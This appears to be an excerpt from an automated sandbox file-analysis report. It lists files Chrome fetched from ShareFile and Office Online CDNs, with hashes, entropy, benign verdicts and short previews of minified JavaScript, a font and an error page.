                                                                    Category:downloaded
                                                                    Size (bytes):16
                                                                    Entropy (8bit):3.452819531114783
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:CD598D2DCE38CFBA2981425AFD8CC5FF
                                                                    SHA1:56C8577B18B89C77A6AC58B925F8ECAB11BEF02C
                                                                    SHA-256:64BC0BCC655408713CCC3195B859007631C335758AAC8575658AC138509233E8
                                                                    SHA-512:61797961E4747CA9CD7B3E6746E5243F7D9EF59B21B27911E974CEB68460C71ED438FEAAE6C7E1BC77A50E687D63A26623DB0AC1204DEAC60D094EFD0271C6FA
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAn6jDVrkH5FaRIFDa8aOOA=?alt=proto
                                                                    Preview:CgkKBw2vGjjgGgA=
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (65472)
                                                                    Category:downloaded
                                                                    Size (bytes):98304
                                                                    Entropy (8bit):5.298170802550365
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:7CEEBDFAD396D83F0F94F3B7130C90C3
                                                                    SHA1:B72A4F91C459D61A8762A211432D1600CC800234
                                                                    SHA-256:CA3C2A8BEABE0D209E985E8DAAC6047AEFA8BC1B65B30C8C8544562B31E5E023
                                                                    SHA-512:2CD6B14101D1D3A28A017DB488EFF1BD2574D52597F1A77DF70BDD6D5D37304EF5E9B082A6553195FD34F0E2EE33C8DE19B6D7964983C254B0D86A4D47F5EDD0
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-audit-collector-pilet/0.20.0/package/dist/index.js
                                                                    Preview://@pilet v:2(webpackChunkpr_sharefiledevauditcollectorpilet,{}).System.register(["antd","react","tslib"],(function(e,t){var r={},n={},o={};return Object.defineProperty(n,"__esModule",{value:!0}),{setters:[function(e){r.App=e.App,r.Button=e.Button,r.DatePicker=e.DatePicker,r.Form=e.Form,r.Input=e.Input,r.Space=e.Space,r.Spin=e.Spin},function(e){Object.keys(e).forEach((function(t){n[t]=e[t]}))},function(e){o.__awaiter=e.__awaiter}],execute:function(){e((()=>{var e,i,a,s,c={4386:(e,t,r)=>{"use strict";r.d(t,{j:()=>u});var n=r(8109);function o(e){return o="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},o(e)}function i(){i=function(){return t};var e,t={},r=Object.prototype,n=r.hasOwnProperty,a=Object.defineProperty||function(e,t,r){e[t]=r.value},s="function"==typeof Symbol?Symbol:{},c=s.iterator||"@@iterator",u=s.asyncIterator||"@@asyncIte
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (46210)
                                                                    Category:dropped
                                                                    Size (bytes):133492
                                                                    Entropy (8bit):5.385971832493047
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:7824E973187A6813027656CF10048C5D
                                                                    SHA1:E6B114ECF9963556CC7B369775AA2AF162EC403A
                                                                    SHA-256:A10F2ED71710EC1606CA81B2E8607F31B264625FC4C11876232B13DBBF276690
                                                                    SHA-512:510E24565B49389AFBD6F5FA90251730D114ADE95D4D12A2D3B3BC6C23831096A9513FDD6686173AB90C499B98BC1530FCC2DE2F26BCEAAD7C7008E940BFC6F9
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview://@pilet v:2(webpackChunkpr_sharefiledevdynamicformspilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router-dom","tslib"],(function(e,t){var r={},n={},o={},i={},a={},s={},c={};return Object.defineProperty(i,"__esModule",{value:!0}),Object.defineProperty(c,"__esModule",{value:!0}),{setters:[function(e){r.ItemsEntity=e.ItemsEntity,r.Uploader=e.Uploader,r.UserRole=e.UserRole,r.UsersEntity=e.UsersEntity,r.ZoneService=e.ZoneService,r.createFile=e.createFile},function(e){n.colorPalette=e.colorPalette,n.sizes=e.sizes},function(e){o.Alert=e.Alert,o.App=e.App,o.Badge=e.Badge,o.Breadcrumb=e.Breadcrumb,o.Button=e.Button,o.Card=e.Card,o.Checkbox=e.Checkbox,o.Col=e.Col,o.Collapse=e.Collapse,o.DatePicker=e.DatePicker,o.Divider=e.Divider,o.Drawer=e.Drawer,o.Dropdown=e.Dropdown,o.Empty=e.Empty,o.Flex=e.Flex,o.Form=e.Form,o.Input=e.Input,o.InputNumber=e.InputNumber,o.Layout=e.Layout,o.Modal=e.Modal,o.Popconfirm=e.Popconfirm,o.Progress=e.Progress
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Web Open Font Format, TrueType, length 3148, version 4.-22282
                                                                    Category:downloaded
                                                                    Size (bytes):3148
                                                                    Entropy (8bit):7.734343585376445
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:FC6E4E67A40B43F280596646588E78AA
                                                                    SHA1:6726DC48C766723426F76D9A5CBFFC1F101CF698
                                                                    SHA-256:FA38AA63FBC816A1B5D4848185BBB1ACB5410A2EE9BB1966DEE80682E460FDA8
                                                                    SHA-512:2616DB52B04D347E793A5B050B510F2781665CAA8AD2A8825ED3FE2EF78C33FD01128186F71F12514951D46FAA3C5484FCDE39403F0FDDECE7D310DEFD0F186C
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://res-1.cdn.office.net/officeonline/hashed/fa38aa63fbc816a1/sharedheaderplaceholder-icons.woff
                                                                    Preview:wOFF.......L.......<........................OS/2...D...H...`1Y{.cmap.......V...z.m..cvt ....... ...*....fpgm...........Y...gasp................glyf...........H....head... ...2...6.P.@hhea...T.......$....hmtx...l............loca...............\maxp........... .'..name...............Upost........... .Q..prep............x...x.c`a_.8.....u..1...4.f...$..........@ ...........<...!$.X......... ..x.c```f.`..F..(....|... -. ..az..\....../.^..y..?.....;.'..$6Ht.M...........,...|....x.c.b.e(`h`X.......x............x.]..N.@..s$..'@:!.u*C....K$.%%...J.......n..b.........|.s...|v..G*)V.7........!O.6eaL.yV.e.j..kN..M.h....Lm....-b....p.N.m.v.....U<..#...O.}.K..,V..&...^...L.c.x.....?ug..l9e..Ns.D....D...K........m..A.M....a.....g.P..`....d.............x..T_H[W...{..5.X.M..!.5.&.[...>..$.Nc.b.*X,...a....XQ......B...B_Z...a/+}*.{.[.Z)...c.....+......9....w~.;..*...p.....Cq....J..nq... ....2......6qK...>.9....U...%..M..Rg..^.T?5E.h$..IBL..P,....*.'a...... .%..Do.M.R9.>Q.G.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:HTML document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):1505
                                                                    Entropy (8bit):5.315674199324367
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:59372A1A3FB09A27594093F0BF524613
                                                                    SHA1:DD44CDA08F082DAC06E0D0FBFA662830B9989926
                                                                    SHA-256:4D16C45DF3C3EDB6B0A3E8937DADB5AE95BF8737A728EEDB397E0C964F16B396
                                                                    SHA-512:2BC00587DD316A697D87B68937A8A34D330E11568DD7A531980C901978FD2EC3C2A6A513856171A7D10C32922EDE46EEC1E5E17459D046091D413A7947E957AE
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="http://www.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>..<title>412 - Precondition set by the client failed when evaluated on the Web server.</title>..<style type="text/css">.. ..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}..-->..</style>..</head>..<body>..<div id="header"><h1>Server Error</h1>
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (5809)
                                                                    Category:dropped
                                                                    Size (bytes):5867
                                                                    Entropy (8bit):5.263765420286969
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:220B62BEAF63371B7CB228874CEE9E99
                                                                    SHA1:7DC830749CADF7F870A47CA16D3F97E2A7F8D113
                                                                    SHA-256:EB37DF6673B8DDF6693E216A6B95EF50C4017122CBE9542B4BA21247C626E4CD
                                                                    SHA-512:0CC82A771B49C6D76D058DE02A42B8D95480E5FE4F784981771E04CCEC9CB1204BECA175622B878A846ED8D202F315E19A1413DB41C81075779FE483085B0F49
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:var healthSmallOffline_worker;!function(){"use strict";var e,t,s,o,r;!function(e){e[e.BSqmError=0]="BSqmError",e[e.Kpi=1]="Kpi",e[e.QosError=2]="QosError",e[e.QosPillar=3]="QosPillar",e[e.DiagnosticLog=4]="DiagnosticLog",e[e.OfflineWorkerInit=5]="OfflineWorkerInit",e[e.OfflineWorkerFlush=6]="OfflineWorkerFlush",e[e.OfflineWorkerFailedUpload=7]="OfflineWorkerFailedUpload"}(e||(e={})),function(e){e.HealthDimensions="d",e.PartCDimensions="a",e.BSqmErrors="b",e.QosErrors="e",e.Heartbeat="h",e.QosPillars="q",e.Kpis="k",e.DiagnosticLogs="l",e.ClientSendTime="t"}(t||(t={})),function(e){e[e.AttemptToUseFunctionalityBeforeIitialization=0]="AttemptToUseFunctionalityBeforeIitialization",e[e.WorkerApiIsNotAvailable=1]="WorkerApiIsNotAvailable",e[e.InvalidWorkerUrl=2]="InvalidWorkerUrl",e[e.InstallingOfflineWorker=3]="InstallingOfflineWorker",e[e.OfflineWorkerMessage=4]="OfflineWorkerMessage",e[e.FailedToProcessMessageFromOfflineWorker=5]="FailedToProcessMessageFromOfflineWorker",e[e.FailedToInstal
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (65478)
                                                                    Category:dropped
                                                                    Size (bytes):308170
                                                                    Entropy (8bit):5.5317397651908236
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:4786967DC659A8ECFCC633BABB5A4D96
                                                                    SHA1:AB0D8807C7E8A3D23DAD38D9289F59658BCD2DBE
                                                                    SHA-256:059C650AEDF8E690DA5D2F7C5D7565FE6C740F0E13900C4F0996A0F2287E5133
                                                                    SHA-512:47FECA8930F8BB7B9A3F50705B3CD68AE783AC3AD745AA2CAB73FC09757B8C8936AD91F226BD77D01D748D90C6FB04FD7786C97C1CD52B07E111171B5238CB83
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview://@pilet v:2(webpackChunkpr_sharefiledevprojectspilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},o={},a={},i={},c={},s={},u={};return Object.defineProperty(a,"__esModule",{value:!0}),{setters:[function(e){n.AccountsEntity=e.AccountsEntity,n.Api=e.Api,n.CapabilitiesEntity=e.CapabilitiesEntity,n.CapabilityName=e.CapabilityName,n.ContactListType=e.ContactListType,n.ContactsEntity=e.ContactsEntity,n.CustomWorkflowBundleType=e.CustomWorkflowBundleType,n.DocumentApprovalWorkflowAction=e.DocumentApprovalWorkflowAction,n.EncryptedEmailsEntity=e.EncryptedEmailsEntity,n.ExceptionReason=e.ExceptionReason,n.FileAction=e.FileAction,n.FileLockEntity=e.FileLockEntity,n.FileVirusStatus=e.FileVirusStatus,n.IntegrationProvider=e.IntegrationProvider,n.IntegrationsEntity=e.IntegrationsEntity,n.ItemOperations=e.ItemOperations,n.ItemOrderingMode=e.ItemOrderingMode,n.ItemsEntity=e.ItemsE
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (65473)
                                                                    Category:dropped
                                                                    Size (bytes):77544
                                                                    Entropy (8bit):5.226997072902139
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:7B642EB641428D924027759152BD26F4
                                                                    SHA1:766963F144406D2019108B5D88F94A5442E8EF14
                                                                    SHA-256:EB209A2C45816EAD1F57DD45FDDA92ECF0B25D8EE874523DE3C0ECA3E7B3C6FE
                                                                    SHA-512:FD7636C1A83F2105EB181341700BAD335744E995764072503F0C7A000DD01AB30E6AC7D04B9EB2C9E83E58B4EA8678BDE582F4157B482BA6FD6A56AE8589C6DF
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview://@pilet v:2(webpackChunkpr_sharefiledevconversationspilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(t,e){var n={},r={},i={},s={},a={},o={},u={},c={};return Object.defineProperty(s,"__esModule",{value:!0}),{setters:[function(t){n.Api=t.Api,n.ItemsEntity=t.ItemsEntity,n.Uploader=t.Uploader,n.UsersEntity=t.UsersEntity,n.ZoneService=t.ZoneService,n.createFile=t.createFile},function(t){r.colorPalette=t.colorPalette,r.sizes=t.sizes},function(t){i.Avatar=t.Avatar,i.Badge=t.Badge,i.Button=t.Button,i.Flex=t.Flex,i.Form=t.Form,i.Grid=t.Grid,i.Input=t.Input,i.Skeleton=t.Skeleton,i.Spin=t.Spin,i.Typography=t.Typography,i.notification=t.notification,i.theme=t.theme},function(t){Object.keys(t).forEach((function(e){s[e]=t[e]}))},function(t){a["default"]=t["default"],a.findDOMNode=t.findDOMNode,a.flushSync=t.flushSync},function(t){o.useHistory=t.useHistory},function(t){u.Link=t.Link,u.useHistory=t
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (65468)
                                                                    Category:downloaded
                                                                    Size (bytes):2046668
                                                                    Entropy (8bit):5.4653919458904285
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:9B5C61CE355167D84EC3E88962AF683E
                                                                    SHA1:E0279CB2CC01A716E5DF1C0CACE4DAE8CAFA87ED
                                                                    SHA-256:6EA4ECF50C2A76A7F602E36636FAE58A45BF9AC19FF8225B995A01FA4330271A
                                                                    SHA-512:C02B1133DF5C1011B4C0D81C43416E7E18EBCFA8C15A4A265834EFF8E22B1D2C2C8681455C324916C873E7CA27AAAA5DB0C56075A38C94657AE0364B5B7CB407
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://res-1.cdn.office.net/officeonline/hashed/6ea4ecf50c2a76a7/common.min.js
                                                                    Preview:/*! For license information please see common.min.js.LICENSE.txt */.(globalThis.wordOnlineChunks=globalThis.wordOnlineChunks||[]).push([[72076],{19277:function(e,t,n){"use strict";function o(e){for(var t,n=0,o=0,r=e.length;r>=4;++o,r-=4)t=1540483477*(65535&(t=255&e.charCodeAt(o)|(255&e.charCodeAt(++o))<<8|(255&e.charCodeAt(++o))<<16|(255&e.charCodeAt(++o))<<24))+(59797*(t>>>16)<<16),n=1540483477*(65535&(t^=t>>>24))+(59797*(t>>>16)<<16)^1540483477*(65535&n)+(59797*(n>>>16)<<16);switch(r){case 3:n^=(255&e.charCodeAt(o+2))<<16;case 2:n^=(255&e.charCodeAt(o+1))<<8;case 1:n=1540483477*(65535&(n^=255&e.charCodeAt(o)))+(59797*(n>>>16)<<16)}return(((n=1540483477*(65535&(n^=n>>>13))+(59797*(n>>>16)<<16))^n>>>15)>>>0).toString(36)}n.d(t,{A:function(){return o}})},84883:function(e,t,n){"use strict";n.d(t,{s:function(){return r}});var o=n(3026);function r(e,t,n){void 0===n&&(n=!0);var r=!1;if(e&&t)if(n)if(e===t)r=!0;else for(r=!1;t;){var i=(0,o.P)(t);if(i===e){r=!0;break}t=i}else e.contains&&(r=e.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (65479)
                                                                    Category:dropped
                                                                    Size (bytes):193456
                                                                    Entropy (8bit):5.4098337647744
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:F46391967F5FD401297C2CEC05D103FD
                                                                    SHA1:F7C3337D9FD69511E438DDFA8BCF15AB6B66251D
                                                                    SHA-256:13BF54D098C6BA08DB5577B39AD750EBBF784F2DDBAE75F33890175D1DD420EA
                                                                    SHA-512:F5773F2A49FFAB8B2C21A65999F9323B26D4AB48D8431F30120A8FDF1BB181E4725438FF0E14B1B05E2A2FD9D71E10534047480F574D326C7551100F21FC0E91
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview://@pilet v:2(webpackChunkpr_sharefiledevtaskmgtpilet,{}).System.register(["@sharefiledev/antd-config","antd","react","react-dom","tslib"],(function(e,t){var n={},r={},o={},i={},a={};return Object.defineProperty(o,"__esModule",{value:!0}),Object.defineProperty(i,"__esModule",{value:!0}),{setters:[function(e){n.sizes=e.sizes},function(e){r.Alert=e.Alert,r.Button=e.Button,r.Card=e.Card,r.Col=e.Col,r.Divider=e.Divider,r.Empty=e.Empty,r.Flex=e.Flex,r.Input=e.Input,r.Layout=e.Layout,r.Menu=e.Menu,r.Popconfirm=e.Popconfirm,r.Result=e.Result,r.Row=e.Row,r.Select=e.Select,r.Skeleton=e.Skeleton,r.Space=e.Space,r.Spin=e.Spin,r.Tabs=e.Tabs,r.Typography=e.Typography,r.theme=e.theme},function(e){Object.keys(e).forEach((function(t){o[t]=e[t]}))},function(e){Object.keys(e).forEach((function(t){i[t]=e[t]}))},function(e){a.__assign=e.__assign,a.__awaiter=e.__awaiter,a.__generator=e.__generator,a.__makeTemplateObject=e.__makeTemplateObject,a.__spreadArray=e.__spreadArray}],execute:function(){e((()=>{var
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):431009
                                                                    Entropy (8bit):5.598364696567613
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:B47D0E68ADEC864386DA08045C06A2CE
                                                                    SHA1:157A3CA52A1A41343AAEBD4836C58AB491BEB895
                                                                    SHA-256:AC241CA27825A33718FB5C239AB56231B8DCFE1C676E6ACFFBB16E447152E769
                                                                    SHA-512:19592CE8AEF8CF5FEF9979C42E5374BEBC7D04130F9E895597AD3939542660D0A691CBB96DC96AE327136730FCABFCD996CB501B8985A0C8DC078C39A6B6333E
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:(globalThis.wordOnlineChunks=globalThis.wordOnlineChunks||[]).push([[7306],{31387:function(e,t,o){var n=o(34667),r=o(60821);"string"==typeof n&&(n=[[e.id,n]]);for(var i=0;i<n.length;i++)r.loadStyles(n[i][1],!1);n.locals&&(e.exports=n.locals)},34667:function(e,t,o){var n=o(28968),r=o(72553)(n);r.push([e.id,'svg>path.OfficeIconColors_m20 {\r\n fill: #FAFAFAFF;\r\n}\r\nsvg>path.OfficeIconColors_m21 {\r\n fill: #C8C6C4FF;\r\n}\r\nsvg>path.OfficeIconColors_m22 {\r\n fill: #3A3A38FF;\r\n}\r\nsvg>path.OfficeIconColors_m23 {\r\n fill: #797774FF;\r\n}\r\nsvg>path.OfficeIconColors_m24 {\r\n fill: #1E8BCDFF;\r\n}\r\nsvg>path.OfficeIconColors_m25 {\r\n fill: #0063B1FF;\r\n}\r\nsvg>path.OfficeIconColors_m26 {\r\n fill: #83BEECFF;\r\n}\r\nsvg>path.OfficeIconColors_m27 {\r\n fill: #379E4EFF;\r\n}\r\nsvg>path.OfficeIconColors_m28 {\r\n fill: #309048FF;\r\n}\r\nsvg>path.OfficeIconColors_m29 {\r\n fill: #A1DDAAFF;\r\n}\r\nsvg>path.OfficeIconColors_m210 {\r\n fill: #DE6C0
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (65479)
                                                                    Category:downloaded
                                                                    Size (bytes):199868
                                                                    Entropy (8bit):5.41109186682965
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:114E798D503A347AAB2A537702E1593F
                                                                    SHA1:EDC8A8C19A54D81944F8EA870D826E06A7362161
                                                                    SHA-256:091AB89F90FE0DBAEDE5C8C9C5308C702C75D49A9CD809CECB9F001F98788C38
                                                                    SHA-512:06CE751BE294ABF4D171F9A9BA070FEBB75A29E45615125F3AD8E9D1905A8484E990CB7CD97092F2953E3FBF1596B4617933FF85C3EA74F40C5FB94237E80DC3
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-task-mgt-pilet/1.7.0/package/dist/index.js
                                                                    Preview://@pilet v:2(webpackChunkpr_sharefiledevtaskmgtpilet,{}).System.register(["@sharefiledev/antd-config","antd","react","react-dom","tslib"],(function(e,t){var n={},r={},o={},i={},a={};return Object.defineProperty(o,"__esModule",{value:!0}),Object.defineProperty(i,"__esModule",{value:!0}),{setters:[function(e){n.sizes=e.sizes},function(e){r.Alert=e.Alert,r.Button=e.Button,r.Card=e.Card,r.Col=e.Col,r.Divider=e.Divider,r.Empty=e.Empty,r.Flex=e.Flex,r.Input=e.Input,r.Layout=e.Layout,r.Menu=e.Menu,r.Popconfirm=e.Popconfirm,r.Result=e.Result,r.Row=e.Row,r.Select=e.Select,r.Skeleton=e.Skeleton,r.Space=e.Space,r.Spin=e.Spin,r.Tabs=e.Tabs,r.Typography=e.Typography,r.theme=e.theme},function(e){Object.keys(e).forEach((function(t){o[t]=e[t]}))},function(e){Object.keys(e).forEach((function(t){i[t]=e[t]}))},function(e){a.__assign=e.__assign,a.__awaiter=e.__awaiter,a.__generator=e.__generator,a.__makeTemplateObject=e.__makeTemplateObject,a.__spreadArray=e.__spreadArray}],execute:function(){e((()=>{var
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):31474
                                                                    Entropy (8bit):5.174241719942233
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:278E48A9B490741DA648B79B0A9D2371
                                                                    SHA1:B409050543E86942DF098F481179E6F4AB0DACA3
                                                                    SHA-256:D649001C14EC131BF68375A2B06B2E6FA18C1B709DF671EF6256E9F2C413A434
                                                                    SHA-512:A745B95B3B9952A2DF6FD6E8D2CDDF1FBF898B159F31949198DAA21C12091D89F093AA4989DBF5341A03BA0042BA034BD71F15FABECED999B9F2010A361EC26B
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:{"Architecture":1,"Audience":0,"Resources":{"Version":"1.20241209.2.0","CatalogXml":"<ResourceCatalog>\r\n <Resources>\r\n <Resource Key=\"_store_mecontrol-fluent-web_3_28_4-preview_4-5e5181f2f5f5ff7016ce_node_modules_mecontrol_flue-106b90\" Type=\"LTRRTLPath\">\r\n <RTLPath>suiteux.shell._store_mecontrol-fluent-web_3_28_4-preview_4-5e5181f2f5f5ff7016ce_node_modules_mecontrol_flue-106b90.55cf7598c5eadb304cad.rtl.js</RTLPath>\r\n <LTRPath>suiteux.shell._store_mecontrol-fluent-web_3_28_4-preview_4-5e5181f2f5f5ff7016ce_node_modules_mecontrol_flue-106b90.55cf7598c5eadb304cad.js</LTRPath>\r\n </Resource>\r\n <Resource Key=\"_store_mecontrol-fluent-web_3_28_4-preview_4-5e5181f2f5f5ff7016ce_node_modules_mecontrol_flue-514c9d\" Type=\"LTRRTLPath\">\r\n <RTLPath>suiteux.shell._store_mecontrol-fluent-web_3_28_4-preview_4-5e5181f2f5f5ff7016ce_node_modules_mecontrol_flue-514c9d.4b5d51ad4b84314ec818.rtl.js</RTLPath>\r\n <LTRPath>suiteux.shell._store_mecontrol-fluent-we
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (65476)
                                                                    Category:dropped
                                                                    Size (bytes):926888
                                                                    Entropy (8bit):5.482173706616214
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:7F792C14410AD4D7E5824140B9BA3A66
                                                                    SHA1:4EB05F92C7EAB6F4E4B54368B3F40C8E832B28EE
                                                                    SHA-256:54B3C1003D0712776C8B69E22EF429E76BC046C64DE63FC06BB24C852717656C
                                                                    SHA-512:E818A3757AB94CE3555124231CCB3B43439CC708472297DEEB7225D68A2D2F259C418EA95D9EA5BDC9F66F5CFFEDBA9158D89E9C57C79C46FC8DEAAEAED65260
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview://@pilet v:2(webpackChunkpr_sharefiledevfileviewerpilet,{}).System.register(["@sharefiledev/antd-config","antd","react","react-router-dom","tslib"],(function(e,t){var n={},i={},r={},s={},a={};return{setters:[function(e){n.colorPalette=e.colorPalette,n.defaultAntDConfig=e.defaultAntDConfig,n.sizes=e.sizes},function(e){i.Alert=e.Alert,i.Button=e.Button,i.Checkbox=e.Checkbox,i.Col=e.Col,i.Divider=e.Divider,i.Flex=e.Flex,i.Input=e.Input,i.Layout=e.Layout,i.Modal=e.Modal,i.Row=e.Row,i.Skeleton=e.Skeleton,i.Spin=e.Spin,i.Tree=e.Tree,i.Typography=e.Typography,i.theme=e.theme},function(e){r.Children=e.Children,r.Fragment=e.Fragment,r.Suspense=e.Suspense,r.createContext=e.createContext,r.createElement=e.createElement,r.default=e.default,r.forwardRef=e.forwardRef,r.isValidElement=e.isValidElement,r.lazy=e.lazy,r.useCallback=e.useCallback,r.useContext=e.useContext,r.useEffect=e.useEffect,r.useLayoutEffect=e.useLayoutEffect,r.useRef=e.useRef,r.useState=e.useState,r.version=e.version},function(e){s
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (65474)
                                                                    Category:downloaded
                                                                    Size (bytes):199512
                                                                    Entropy (8bit):5.361186797681031
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:38596D901C05CDCB1B7DB1F4D6D21BA7
                                                                    SHA1:8A86524AAEE7B7462081A6A3C6F9FBCF6174C80A
                                                                    SHA-256:159C798B7CB0A3F271E179FBFF2D2862394D1F2832F248D6F71802C7F253C04E
                                                                    SHA-512:3FFB8DF04864002AE61D41DCF30B55BDBB3285E0843425EDDD0BFB2258CEA89FE540123F98F5B896673C3E41A5D096123E87BB6E519FD3B8639C10438ABD9D7D
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-entitlements-pilet/0.1.54/package/dist/index.js
                                                                    Preview://@pilet v:2(webpackChunkpr_sharefiledeventitlementspilet,{}).System.register(["@sharefiledev/antd-config","antd","react","react-router-dom","tslib"],(function(e,t){var n={},r={},o={},i={},a={};return Object.defineProperty(o,"__esModule",{value:!0}),{setters:[function(e){n.sizes=e.sizes},function(e){r.Alert=e.Alert,r.Button=e.Button,r.Card=e.Card,r.Col=e.Col,r.Divider=e.Divider,r.Flex=e.Flex,r.Image=e.Image,r.Layout=e.Layout,r.Row=e.Row,r.Skeleton=e.Skeleton,r.Space=e.Space,r.Spin=e.Spin,r.Typography=e.Typography,r.notification=e.notification,r.theme=e.theme},function(e){Object.keys(e).forEach((function(t){o[t]=e[t]}))},function(e){i.useHistory=e.useHistory,i.useLocation=e.useLocation},function(e){a.__awaiter=e.__awaiter,a.__rest=e.__rest}],execute:function(){e((()=>{var e,s,u,c,l={439:(e,t,n)=>{"use strict";n.d(t,{z1:()=>k,cM:()=>y});var r=n(2456),o=n(6250),i=2,a=.16,s=.05,u=.05,c=.15,l=5,f=4,d=[{index:7,opacity:.15},{index:6,opacity:.25},{index:5,opacity:.3},{index:5,opacity:.45},{in
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (65476)
                                                                    Category:downloaded
                                                                    Size (bytes):120056
                                                                    Entropy (8bit):5.389199436611293
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:33040C25DCD11460D4FCAF829905E8BD
                                                                    SHA1:9FF06962F665FF8F73E63B2334A33ADC5A8CE22A
                                                                    SHA-256:044AAAC4452227A53E27DED5C4B3314735974E392E836D2D0489712B0BDD8AF7
                                                                    SHA-512:0C2E4169A77DA124DD18423441B698693526940DA0E75A1732298CDEF3F6FC532B754358880F6997A850310A6B3EA66A80BFCE56D313388645F2A1B25A9D6CF5
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-view-engine-pilet/1.24.0/package/dist/index.js
